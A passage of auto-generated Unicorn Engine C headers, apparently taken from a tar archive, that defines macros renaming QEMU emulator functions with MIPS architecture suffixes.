helper_msa_sra_b_mips64el #define helper_msa_sra_h helper_msa_sra_h_mips64el #define helper_msa_sra_w helper_msa_sra_w_mips64el #define helper_msa_sra_d helper_msa_sra_d_mips64el #define helper_msa_srar_b helper_msa_srar_b_mips64el #define helper_msa_srar_h helper_msa_srar_h_mips64el #define helper_msa_srar_w helper_msa_srar_w_mips64el #define helper_msa_srar_d helper_msa_srar_d_mips64el #define helper_msa_srl_b helper_msa_srl_b_mips64el #define helper_msa_srl_h helper_msa_srl_h_mips64el #define helper_msa_srl_w helper_msa_srl_w_mips64el #define helper_msa_srl_d helper_msa_srl_d_mips64el #define helper_msa_srlr_b helper_msa_srlr_b_mips64el #define helper_msa_srlr_h helper_msa_srlr_h_mips64el #define helper_msa_srlr_w helper_msa_srlr_w_mips64el #define helper_msa_srlr_d helper_msa_srlr_d_mips64el #define helper_msa_andi_b helper_msa_andi_b_mips64el #define helper_msa_ori_b helper_msa_ori_b_mips64el #define helper_msa_nori_b helper_msa_nori_b_mips64el #define helper_msa_xori_b helper_msa_xori_b_mips64el #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64el #define helper_msa_bmzi_b helper_msa_bmzi_b_mips64el #define helper_msa_bseli_b helper_msa_bseli_b_mips64el #define helper_msa_shf_df helper_msa_shf_df_mips64el #define helper_msa_addvi_df helper_msa_addvi_df_mips64el #define helper_msa_subvi_df helper_msa_subvi_df_mips64el #define helper_msa_ceqi_df helper_msa_ceqi_df_mips64el #define helper_msa_clei_s_df helper_msa_clei_s_df_mips64el #define helper_msa_clei_u_df helper_msa_clei_u_df_mips64el #define helper_msa_clti_s_df helper_msa_clti_s_df_mips64el #define helper_msa_clti_u_df helper_msa_clti_u_df_mips64el #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64el #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64el #define helper_msa_mini_s_df helper_msa_mini_s_df_mips64el #define helper_msa_mini_u_df helper_msa_mini_u_df_mips64el #define helper_msa_ldi_df helper_msa_ldi_df_mips64el #define helper_msa_slli_df helper_msa_slli_df_mips64el #define helper_msa_srai_df helper_msa_srai_df_mips64el #define helper_msa_srli_df helper_msa_srli_df_mips64el #define helper_msa_bclri_df helper_msa_bclri_df_mips64el #define helper_msa_bseti_df helper_msa_bseti_df_mips64el #define helper_msa_bnegi_df helper_msa_bnegi_df_mips64el #define helper_msa_sat_s_df helper_msa_sat_s_df_mips64el #define helper_msa_sat_u_df helper_msa_sat_u_df_mips64el #define helper_msa_srari_df helper_msa_srari_df_mips64el #define helper_msa_srlri_df helper_msa_srlri_df_mips64el #define helper_msa_binsli_df helper_msa_binsli_df_mips64el #define helper_msa_binsri_df helper_msa_binsri_df_mips64el #define helper_msa_subv_df helper_msa_subv_df_mips64el #define helper_msa_subs_s_df helper_msa_subs_s_df_mips64el #define helper_msa_subs_u_df helper_msa_subs_u_df_mips64el #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64el #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64el #define helper_msa_mulv_df helper_msa_mulv_df_mips64el #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64el #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64el #define helper_msa_mul_q_df helper_msa_mul_q_df_mips64el #define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64el #define helper_msa_sld_df helper_msa_sld_df_mips64el #define helper_msa_maddv_df helper_msa_maddv_df_mips64el #define helper_msa_msubv_df helper_msa_msubv_df_mips64el #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64el #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64el #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64el #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64el #define helper_msa_binsl_df helper_msa_binsl_df_mips64el #define helper_msa_binsr_df helper_msa_binsr_df_mips64el #define helper_msa_madd_q_df helper_msa_madd_q_df_mips64el #define helper_msa_msub_q_df helper_msa_msub_q_df_mips64el #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64el #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64el #define helper_msa_splat_df helper_msa_splat_df_mips64el #define helper_msa_vshf_df helper_msa_vshf_df_mips64el #define helper_msa_sldi_df helper_msa_sldi_df_mips64el #define helper_msa_splati_df helper_msa_splati_df_mips64el #define helper_msa_copy_s_b helper_msa_copy_s_b_mips64el #define helper_msa_copy_s_h helper_msa_copy_s_h_mips64el #define helper_msa_copy_s_w helper_msa_copy_s_w_mips64el #define helper_msa_copy_s_d helper_msa_copy_s_d_mips64el #define helper_msa_copy_u_b helper_msa_copy_u_b_mips64el #define helper_msa_copy_u_h helper_msa_copy_u_h_mips64el #define helper_msa_copy_u_w helper_msa_copy_u_w_mips64el #define helper_msa_insert_b helper_msa_insert_b_mips64el #define helper_msa_insert_h helper_msa_insert_h_mips64el #define helper_msa_insert_w helper_msa_insert_w_mips64el #define helper_msa_insert_d helper_msa_insert_d_mips64el #define helper_msa_insve_df helper_msa_insve_df_mips64el #define helper_msa_ctcmsa helper_msa_ctcmsa_mips64el #define helper_msa_cfcmsa helper_msa_cfcmsa_mips64el #define helper_msa_fill_df helper_msa_fill_df_mips64el #define helper_msa_fcaf_df helper_msa_fcaf_df_mips64el #define helper_msa_fcun_df helper_msa_fcun_df_mips64el #define helper_msa_fceq_df helper_msa_fceq_df_mips64el #define helper_msa_fcueq_df helper_msa_fcueq_df_mips64el #define helper_msa_fclt_df helper_msa_fclt_df_mips64el #define helper_msa_fcult_df helper_msa_fcult_df_mips64el #define helper_msa_fcle_df helper_msa_fcle_df_mips64el #define helper_msa_fcule_df helper_msa_fcule_df_mips64el #define helper_msa_fsaf_df helper_msa_fsaf_df_mips64el #define helper_msa_fsun_df helper_msa_fsun_df_mips64el #define helper_msa_fseq_df helper_msa_fseq_df_mips64el #define helper_msa_fsueq_df helper_msa_fsueq_df_mips64el #define helper_msa_fslt_df helper_msa_fslt_df_mips64el #define helper_msa_fsult_df helper_msa_fsult_df_mips64el #define helper_msa_fsle_df helper_msa_fsle_df_mips64el #define helper_msa_fsule_df helper_msa_fsule_df_mips64el #define helper_msa_fcor_df helper_msa_fcor_df_mips64el #define helper_msa_fcune_df helper_msa_fcune_df_mips64el #define helper_msa_fcne_df helper_msa_fcne_df_mips64el #define helper_msa_fsor_df helper_msa_fsor_df_mips64el #define helper_msa_fsune_df helper_msa_fsune_df_mips64el #define helper_msa_fsne_df helper_msa_fsne_df_mips64el #define helper_msa_fadd_df helper_msa_fadd_df_mips64el #define helper_msa_fsub_df helper_msa_fsub_df_mips64el #define helper_msa_fmul_df helper_msa_fmul_df_mips64el #define helper_msa_fdiv_df helper_msa_fdiv_df_mips64el #define helper_msa_fmadd_df helper_msa_fmadd_df_mips64el #define helper_msa_fmsub_df helper_msa_fmsub_df_mips64el #define helper_msa_fexp2_df helper_msa_fexp2_df_mips64el #define helper_msa_fexdo_df helper_msa_fexdo_df_mips64el #define helper_msa_ftq_df helper_msa_ftq_df_mips64el #define helper_msa_fmin_df helper_msa_fmin_df_mips64el #define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64el #define helper_msa_fmax_df helper_msa_fmax_df_mips64el #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64el #define helper_msa_fclass_df helper_msa_fclass_df_mips64el #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64el #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64el #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64el #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64el #define helper_msa_frcp_df helper_msa_frcp_df_mips64el #define helper_msa_frint_df helper_msa_frint_df_mips64el #define helper_msa_flog2_df helper_msa_flog2_df_mips64el #define helper_msa_fexupl_df helper_msa_fexupl_df_mips64el #define helper_msa_fexupr_df helper_msa_fexupr_df_mips64el #define helper_msa_ffql_df helper_msa_ffql_df_mips64el #define helper_msa_ffqr_df helper_msa_ffqr_df_mips64el #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64el #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64el #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64el #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64el #define helper_raise_exception_err helper_raise_exception_err_mips64el #define helper_raise_exception helper_raise_exception_mips64el #define helper_raise_exception_debug helper_raise_exception_debug_mips64el #define helper_muls helper_muls_mips64el #define helper_mulsu helper_mulsu_mips64el #define helper_macc helper_macc_mips64el #define helper_macchi helper_macchi_mips64el #define helper_maccu helper_maccu_mips64el #define helper_macchiu helper_macchiu_mips64el #define helper_msac helper_msac_mips64el #define helper_msachi helper_msachi_mips64el #define helper_msacu helper_msacu_mips64el #define helper_msachiu helper_msachiu_mips64el #define helper_mulhi helper_mulhi_mips64el #define helper_mulhiu helper_mulhiu_mips64el #define helper_mulshi helper_mulshi_mips64el #define helper_mulshiu helper_mulshiu_mips64el #define helper_dbitswap helper_dbitswap_mips64el #define helper_bitswap helper_bitswap_mips64el #define helper_rotx helper_rotx_mips64el #define helper_ll helper_ll_mips64el #define helper_lld helper_lld_mips64el #define helper_swl helper_swl_mips64el #define helper_swr helper_swr_mips64el #define helper_sdl helper_sdl_mips64el #define helper_sdr helper_sdr_mips64el #define helper_lwm helper_lwm_mips64el #define helper_swm helper_swm_mips64el #define helper_ldm helper_ldm_mips64el #define helper_sdm helper_sdm_mips64el #define helper_fork helper_fork_mips64el #define helper_yield helper_yield_mips64el #define r4k_helper_tlbinv r4k_helper_tlbinv_mips64el #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64el #define r4k_helper_tlbwi r4k_helper_tlbwi_mips64el #define r4k_helper_tlbwr r4k_helper_tlbwr_mips64el #define r4k_helper_tlbp r4k_helper_tlbp_mips64el #define r4k_helper_tlbr r4k_helper_tlbr_mips64el #define helper_tlbwi helper_tlbwi_mips64el #define helper_tlbwr helper_tlbwr_mips64el #define helper_tlbp helper_tlbp_mips64el #define helper_tlbr helper_tlbr_mips64el #define helper_tlbinv helper_tlbinv_mips64el #define helper_tlbinvf helper_tlbinvf_mips64el #define helper_ginvt helper_ginvt_mips64el #define helper_di helper_di_mips64el #define helper_ei helper_ei_mips64el #define helper_eret helper_eret_mips64el #define helper_eretnc helper_eretnc_mips64el #define helper_deret helper_deret_mips64el #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64el #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64el #define helper_rdhwr_cc helper_rdhwr_cc_mips64el #define helper_rdhwr_ccres helper_rdhwr_ccres_mips64el #define helper_rdhwr_performance helper_rdhwr_performance_mips64el #define helper_rdhwr_xnp helper_rdhwr_xnp_mips64el #define helper_pmon helper_pmon_mips64el #define helper_wait helper_wait_mips64el #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64el #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mips64el #define helper_msa_ld_b helper_msa_ld_b_mips64el #define helper_msa_ld_h helper_msa_ld_h_mips64el #define helper_msa_ld_w helper_msa_ld_w_mips64el #define helper_msa_ld_d helper_msa_ld_d_mips64el #define helper_msa_st_b helper_msa_st_b_mips64el #define helper_msa_st_h helper_msa_st_h_mips64el #define helper_msa_st_w helper_msa_st_w_mips64el #define helper_msa_st_d helper_msa_st_d_mips64el #define helper_cache helper_cache_mips64el #define gen_intermediate_code gen_intermediate_code_mips64el #define mips_tcg_init mips_tcg_init_mips64el #define cpu_mips_realize_env cpu_mips_realize_env_mips64el #define cpu_state_reset cpu_state_reset_mips64el #define restore_state_to_opc restore_state_to_opc_mips64el #define ieee_rm ieee_rm_mips64el #define mips_defs mips_defs_mips64el #define mips_defs_number mips_defs_number_mips64el #define gen_helper_float_class_s gen_helper_float_class_s_mips64el #define gen_helper_float_class_d gen_helper_float_class_d_mips64el #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/mipsel.h�������������������������������������������������������������������������0000664�0000000�0000000�00000402103�14675241067�0015615�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_mipsel_H #define UNICORN_AUTOGEN_mipsel_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _mipsel #endif #define unicorn_fill_tlb unicorn_fill_tlb_mipsel #define reg_read reg_read_mipsel #define reg_write reg_write_mipsel #define uc_init uc_init_mipsel #define uc_add_inline_hook uc_add_inline_hook_mipsel #define uc_del_inline_hook uc_del_inline_hook_mipsel #define tb_invalidate_phys_range tb_invalidate_phys_range_mipsel #define use_idiv_instructions use_idiv_instructions_mipsel #define arm_arch arm_arch_mipsel #define tb_target_set_jmp_target tb_target_set_jmp_target_mipsel #define have_bmi1 have_bmi1_mipsel #define have_popcnt have_popcnt_mipsel #define have_avx1 have_avx1_mipsel #define have_avx2 have_avx2_mipsel #define have_isa have_isa_mipsel #define have_altivec have_altivec_mipsel #define have_vsx have_vsx_mipsel #define flush_icache_range flush_icache_range_mipsel #define s390_facilities s390_facilities_mipsel #define tcg_dump_op tcg_dump_op_mipsel #define tcg_dump_ops tcg_dump_ops_mipsel #define tcg_gen_and_i64 tcg_gen_and_i64_mipsel #define tcg_gen_discard_i64 tcg_gen_discard_i64_mipsel #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_mipsel #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_mipsel #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_mipsel #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_mipsel #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_mipsel #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_mipsel #define tcg_gen_ld_i64 tcg_gen_ld_i64_mipsel #define tcg_gen_mov_i64 tcg_gen_mov_i64_mipsel #define tcg_gen_movi_i64 tcg_gen_movi_i64_mipsel #define tcg_gen_mul_i64 tcg_gen_mul_i64_mipsel #define tcg_gen_or_i64 tcg_gen_or_i64_mipsel #define tcg_gen_sar_i64 tcg_gen_sar_i64_mipsel #define tcg_gen_shl_i64 tcg_gen_shl_i64_mipsel #define tcg_gen_shr_i64 tcg_gen_shr_i64_mipsel #define tcg_gen_st_i64 tcg_gen_st_i64_mipsel #define tcg_gen_xor_i64 tcg_gen_xor_i64_mipsel #define cpu_icount_to_ns cpu_icount_to_ns_mipsel #define cpu_is_stopped cpu_is_stopped_mipsel #define cpu_get_ticks cpu_get_ticks_mipsel #define cpu_get_clock cpu_get_clock_mipsel #define cpu_resume cpu_resume_mipsel #define qemu_init_vcpu qemu_init_vcpu_mipsel #define cpu_stop_current cpu_stop_current_mipsel #define resume_all_vcpus resume_all_vcpus_mipsel #define vm_start vm_start_mipsel #define address_space_dispatch_compact address_space_dispatch_compact_mipsel #define flatview_translate flatview_translate_mipsel #define address_space_translate_for_iotlb address_space_translate_for_iotlb_mipsel #define qemu_get_cpu qemu_get_cpu_mipsel #define cpu_address_space_init cpu_address_space_init_mipsel #define cpu_get_address_space cpu_get_address_space_mipsel #define cpu_exec_unrealizefn cpu_exec_unrealizefn_mipsel #define cpu_exec_initfn cpu_exec_initfn_mipsel #define cpu_exec_realizefn cpu_exec_realizefn_mipsel #define tb_invalidate_phys_addr tb_invalidate_phys_addr_mipsel #define cpu_watchpoint_insert cpu_watchpoint_insert_mipsel #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mipsel #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mipsel #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mipsel #define cpu_breakpoint_insert cpu_breakpoint_insert_mipsel #define cpu_breakpoint_remove cpu_breakpoint_remove_mipsel #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mipsel #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mipsel #define cpu_abort cpu_abort_mipsel #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_mipsel #define memory_region_section_get_iotlb memory_region_section_get_iotlb_mipsel #define flatview_add_to_dispatch flatview_add_to_dispatch_mipsel #define qemu_ram_get_host_addr qemu_ram_get_host_addr_mipsel #define qemu_ram_get_offset qemu_ram_get_offset_mipsel #define qemu_ram_get_used_length qemu_ram_get_used_length_mipsel #define qemu_ram_is_shared qemu_ram_is_shared_mipsel #define qemu_ram_pagesize qemu_ram_pagesize_mipsel #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_mipsel #define qemu_ram_alloc qemu_ram_alloc_mipsel #define qemu_ram_free qemu_ram_free_mipsel #define qemu_map_ram_ptr qemu_map_ram_ptr_mipsel #define qemu_ram_block_host_offset qemu_ram_block_host_offset_mipsel #define qemu_ram_block_from_host qemu_ram_block_from_host_mipsel #define qemu_ram_addr_from_host qemu_ram_addr_from_host_mipsel #define cpu_check_watchpoint cpu_check_watchpoint_mipsel #define iotlb_to_section iotlb_to_section_mipsel #define address_space_dispatch_new address_space_dispatch_new_mipsel #define address_space_dispatch_free address_space_dispatch_free_mipsel #define flatview_read_continue flatview_read_continue_mipsel #define address_space_read_full address_space_read_full_mipsel #define address_space_write address_space_write_mipsel #define address_space_rw address_space_rw_mipsel #define cpu_physical_memory_rw cpu_physical_memory_rw_mipsel #define address_space_write_rom address_space_write_rom_mipsel #define cpu_flush_icache_range cpu_flush_icache_range_mipsel #define cpu_exec_init_all cpu_exec_init_all_mipsel #define address_space_access_valid address_space_access_valid_mipsel #define address_space_map address_space_map_mipsel #define address_space_unmap address_space_unmap_mipsel #define cpu_physical_memory_map cpu_physical_memory_map_mipsel #define cpu_physical_memory_unmap cpu_physical_memory_unmap_mipsel #define cpu_memory_rw_debug cpu_memory_rw_debug_mipsel #define qemu_target_page_size qemu_target_page_size_mipsel #define qemu_target_page_bits qemu_target_page_bits_mipsel #define qemu_target_page_bits_min qemu_target_page_bits_min_mipsel #define target_words_bigendian target_words_bigendian_mipsel #define cpu_physical_memory_is_io cpu_physical_memory_is_io_mipsel #define ram_block_discard_range ram_block_discard_range_mipsel #define ramblock_is_pmem ramblock_is_pmem_mipsel #define page_size_init page_size_init_mipsel #define set_preferred_target_page_bits set_preferred_target_page_bits_mipsel #define finalize_target_page_bits finalize_target_page_bits_mipsel #define cpu_outb cpu_outb_mipsel #define cpu_outw cpu_outw_mipsel #define cpu_outl cpu_outl_mipsel #define cpu_inb cpu_inb_mipsel #define cpu_inw cpu_inw_mipsel #define cpu_inl cpu_inl_mipsel #define memory_map memory_map_mipsel #define memory_map_io memory_map_io_mipsel #define memory_map_ptr memory_map_ptr_mipsel #define memory_cow memory_cow_mipsel #define memory_unmap memory_unmap_mipsel #define memory_moveout memory_moveout_mipsel #define memory_movein memory_movein_mipsel #define memory_free memory_free_mipsel #define flatview_unref flatview_unref_mipsel #define address_space_get_flatview address_space_get_flatview_mipsel #define memory_region_transaction_begin memory_region_transaction_begin_mipsel #define memory_region_transaction_commit memory_region_transaction_commit_mipsel #define memory_region_init memory_region_init_mipsel #define memory_region_access_valid memory_region_access_valid_mipsel #define memory_region_dispatch_read memory_region_dispatch_read_mipsel #define memory_region_dispatch_write memory_region_dispatch_write_mipsel #define memory_region_init_io memory_region_init_io_mipsel #define memory_region_init_ram_ptr memory_region_init_ram_ptr_mipsel #define memory_region_size memory_region_size_mipsel #define memory_region_set_readonly memory_region_set_readonly_mipsel #define memory_region_get_ram_ptr memory_region_get_ram_ptr_mipsel #define memory_region_from_host memory_region_from_host_mipsel #define memory_region_get_ram_addr memory_region_get_ram_addr_mipsel #define memory_region_add_subregion memory_region_add_subregion_mipsel #define memory_region_del_subregion memory_region_del_subregion_mipsel #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_mipsel #define memory_region_find memory_region_find_mipsel #define memory_region_filter_subregions memory_region_filter_subregions_mipsel #define memory_listener_register memory_listener_register_mipsel #define memory_listener_unregister memory_listener_unregister_mipsel #define address_space_remove_listeners address_space_remove_listeners_mipsel #define address_space_init address_space_init_mipsel #define address_space_destroy address_space_destroy_mipsel #define memory_region_init_ram memory_region_init_ram_mipsel #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mipsel #define find_memory_mapping find_memory_mapping_mipsel #define exec_inline_op exec_inline_op_mipsel #define floatx80_default_nan floatx80_default_nan_mipsel #define float_raise float_raise_mipsel #define float16_is_quiet_nan float16_is_quiet_nan_mipsel #define float16_is_signaling_nan float16_is_signaling_nan_mipsel #define float32_is_quiet_nan float32_is_quiet_nan_mipsel #define float32_is_signaling_nan float32_is_signaling_nan_mipsel #define float64_is_quiet_nan float64_is_quiet_nan_mipsel #define float64_is_signaling_nan float64_is_signaling_nan_mipsel #define floatx80_is_quiet_nan floatx80_is_quiet_nan_mipsel #define floatx80_is_signaling_nan floatx80_is_signaling_nan_mipsel #define floatx80_silence_nan floatx80_silence_nan_mipsel #define propagateFloatx80NaN propagateFloatx80NaN_mipsel #define float128_is_quiet_nan float128_is_quiet_nan_mipsel #define float128_is_signaling_nan float128_is_signaling_nan_mipsel #define float128_silence_nan float128_silence_nan_mipsel #define float16_add float16_add_mipsel #define float16_sub float16_sub_mipsel #define float32_add float32_add_mipsel #define float32_sub float32_sub_mipsel #define float64_add float64_add_mipsel #define float64_sub float64_sub_mipsel #define float16_mul float16_mul_mipsel #define float32_mul float32_mul_mipsel #define float64_mul float64_mul_mipsel #define float16_muladd float16_muladd_mipsel #define float32_muladd float32_muladd_mipsel #define float64_muladd float64_muladd_mipsel #define float16_div float16_div_mipsel #define float32_div float32_div_mipsel #define float64_div float64_div_mipsel #define float16_to_float32 float16_to_float32_mipsel #define float16_to_float64 float16_to_float64_mipsel #define float32_to_float16 float32_to_float16_mipsel #define float32_to_float64 float32_to_float64_mipsel #define float64_to_float16 float64_to_float16_mipsel #define float64_to_float32 float64_to_float32_mipsel #define float16_round_to_int float16_round_to_int_mipsel #define float32_round_to_int float32_round_to_int_mipsel #define float64_round_to_int float64_round_to_int_mipsel #define float16_to_int16_scalbn float16_to_int16_scalbn_mipsel #define float16_to_int32_scalbn float16_to_int32_scalbn_mipsel #define float16_to_int64_scalbn float16_to_int64_scalbn_mipsel #define float32_to_int16_scalbn float32_to_int16_scalbn_mipsel #define float32_to_int32_scalbn float32_to_int32_scalbn_mipsel #define float32_to_int64_scalbn float32_to_int64_scalbn_mipsel #define float64_to_int16_scalbn float64_to_int16_scalbn_mipsel #define float64_to_int32_scalbn float64_to_int32_scalbn_mipsel #define float64_to_int64_scalbn float64_to_int64_scalbn_mipsel #define float16_to_int16 float16_to_int16_mipsel #define float16_to_int32 float16_to_int32_mipsel #define float16_to_int64 float16_to_int64_mipsel #define float32_to_int16 float32_to_int16_mipsel #define float32_to_int32 float32_to_int32_mipsel #define float32_to_int64 float32_to_int64_mipsel #define float64_to_int16 float64_to_int16_mipsel #define float64_to_int32 float64_to_int32_mipsel #define float64_to_int64 float64_to_int64_mipsel #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_mipsel #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_mipsel #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_mipsel #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_mipsel #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_mipsel #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_mipsel #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mipsel #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mipsel #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mipsel #define float16_to_uint16_scalbn float16_to_uint16_scalbn_mipsel #define float16_to_uint32_scalbn float16_to_uint32_scalbn_mipsel #define float16_to_uint64_scalbn float16_to_uint64_scalbn_mipsel #define float32_to_uint16_scalbn float32_to_uint16_scalbn_mipsel #define float32_to_uint32_scalbn float32_to_uint32_scalbn_mipsel #define float32_to_uint64_scalbn float32_to_uint64_scalbn_mipsel #define float64_to_uint16_scalbn float64_to_uint16_scalbn_mipsel #define float64_to_uint32_scalbn float64_to_uint32_scalbn_mipsel #define float64_to_uint64_scalbn float64_to_uint64_scalbn_mipsel #define float16_to_uint16 float16_to_uint16_mipsel #define float16_to_uint32 float16_to_uint32_mipsel #define float16_to_uint64 float16_to_uint64_mipsel #define float32_to_uint16 float32_to_uint16_mipsel #define float32_to_uint32 float32_to_uint32_mipsel #define float32_to_uint64 float32_to_uint64_mipsel #define float64_to_uint16 float64_to_uint16_mipsel #define float64_to_uint32 float64_to_uint32_mipsel #define float64_to_uint64 float64_to_uint64_mipsel #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_mipsel #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_mipsel #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_mipsel #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_mipsel #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_mipsel #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_mipsel #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mipsel #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mipsel #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mipsel #define int64_to_float16_scalbn int64_to_float16_scalbn_mipsel #define int32_to_float16_scalbn int32_to_float16_scalbn_mipsel #define int16_to_float16_scalbn int16_to_float16_scalbn_mipsel #define int64_to_float16 int64_to_float16_mipsel #define int32_to_float16 int32_to_float16_mipsel #define int16_to_float16 int16_to_float16_mipsel #define int64_to_float32_scalbn int64_to_float32_scalbn_mipsel #define int32_to_float32_scalbn int32_to_float32_scalbn_mipsel #define int16_to_float32_scalbn int16_to_float32_scalbn_mipsel #define int64_to_float32 int64_to_float32_mipsel #define int32_to_float32 int32_to_float32_mipsel #define int16_to_float32 int16_to_float32_mipsel #define int64_to_float64_scalbn int64_to_float64_scalbn_mipsel #define int32_to_float64_scalbn int32_to_float64_scalbn_mipsel #define int16_to_float64_scalbn int16_to_float64_scalbn_mipsel #define int64_to_float64 int64_to_float64_mipsel #define int32_to_float64 int32_to_float64_mipsel #define int16_to_float64 int16_to_float64_mipsel #define uint64_to_float16_scalbn uint64_to_float16_scalbn_mipsel #define uint32_to_float16_scalbn uint32_to_float16_scalbn_mipsel #define uint16_to_float16_scalbn uint16_to_float16_scalbn_mipsel #define uint64_to_float16 uint64_to_float16_mipsel #define uint32_to_float16 uint32_to_float16_mipsel #define uint16_to_float16 uint16_to_float16_mipsel #define uint64_to_float32_scalbn uint64_to_float32_scalbn_mipsel #define uint32_to_float32_scalbn uint32_to_float32_scalbn_mipsel #define uint16_to_float32_scalbn uint16_to_float32_scalbn_mipsel #define uint64_to_float32 uint64_to_float32_mipsel #define uint32_to_float32 uint32_to_float32_mipsel #define uint16_to_float32 uint16_to_float32_mipsel #define uint64_to_float64_scalbn uint64_to_float64_scalbn_mipsel #define uint32_to_float64_scalbn uint32_to_float64_scalbn_mipsel #define uint16_to_float64_scalbn uint16_to_float64_scalbn_mipsel #define uint64_to_float64 uint64_to_float64_mipsel #define uint32_to_float64 uint32_to_float64_mipsel #define uint16_to_float64 uint16_to_float64_mipsel #define float16_min float16_min_mipsel #define float16_minnum float16_minnum_mipsel #define float16_minnummag float16_minnummag_mipsel #define float16_max float16_max_mipsel #define float16_maxnum float16_maxnum_mipsel #define float16_maxnummag float16_maxnummag_mipsel #define float32_min float32_min_mipsel #define float32_minnum float32_minnum_mipsel #define float32_minnummag float32_minnummag_mipsel #define float32_max float32_max_mipsel #define float32_maxnum float32_maxnum_mipsel #define float32_maxnummag float32_maxnummag_mipsel #define float64_min float64_min_mipsel #define float64_minnum float64_minnum_mipsel #define float64_minnummag float64_minnummag_mipsel #define float64_max float64_max_mipsel #define float64_maxnum float64_maxnum_mipsel #define float64_maxnummag float64_maxnummag_mipsel #define float16_compare float16_compare_mipsel #define float16_compare_quiet float16_compare_quiet_mipsel #define float32_compare float32_compare_mipsel #define float32_compare_quiet float32_compare_quiet_mipsel #define float64_compare float64_compare_mipsel #define float64_compare_quiet float64_compare_quiet_mipsel #define float16_scalbn float16_scalbn_mipsel #define float32_scalbn float32_scalbn_mipsel #define float64_scalbn float64_scalbn_mipsel #define float16_sqrt float16_sqrt_mipsel #define float32_sqrt float32_sqrt_mipsel #define float64_sqrt float64_sqrt_mipsel #define float16_default_nan float16_default_nan_mipsel #define float32_default_nan float32_default_nan_mipsel #define float64_default_nan float64_default_nan_mipsel #define float128_default_nan float128_default_nan_mipsel #define float16_silence_nan float16_silence_nan_mipsel #define float32_silence_nan float32_silence_nan_mipsel #define float64_silence_nan float64_silence_nan_mipsel #define float16_squash_input_denormal float16_squash_input_denormal_mipsel #define float32_squash_input_denormal float32_squash_input_denormal_mipsel #define float64_squash_input_denormal float64_squash_input_denormal_mipsel #define normalizeFloatx80Subnormal normalizeFloatx80Subnormal_mipsel #define roundAndPackFloatx80 roundAndPackFloatx80_mipsel #define normalizeRoundAndPackFloatx80 normalizeRoundAndPackFloatx80_mipsel #define int32_to_floatx80 int32_to_floatx80_mipsel #define int32_to_float128 int32_to_float128_mipsel #define int64_to_floatx80 int64_to_floatx80_mipsel #define int64_to_float128 int64_to_float128_mipsel #define uint64_to_float128 uint64_to_float128_mipsel #define float32_to_floatx80 float32_to_floatx80_mipsel #define float32_to_float128 float32_to_float128_mipsel #define float32_rem float32_rem_mipsel #define float32_exp2 float32_exp2_mipsel #define 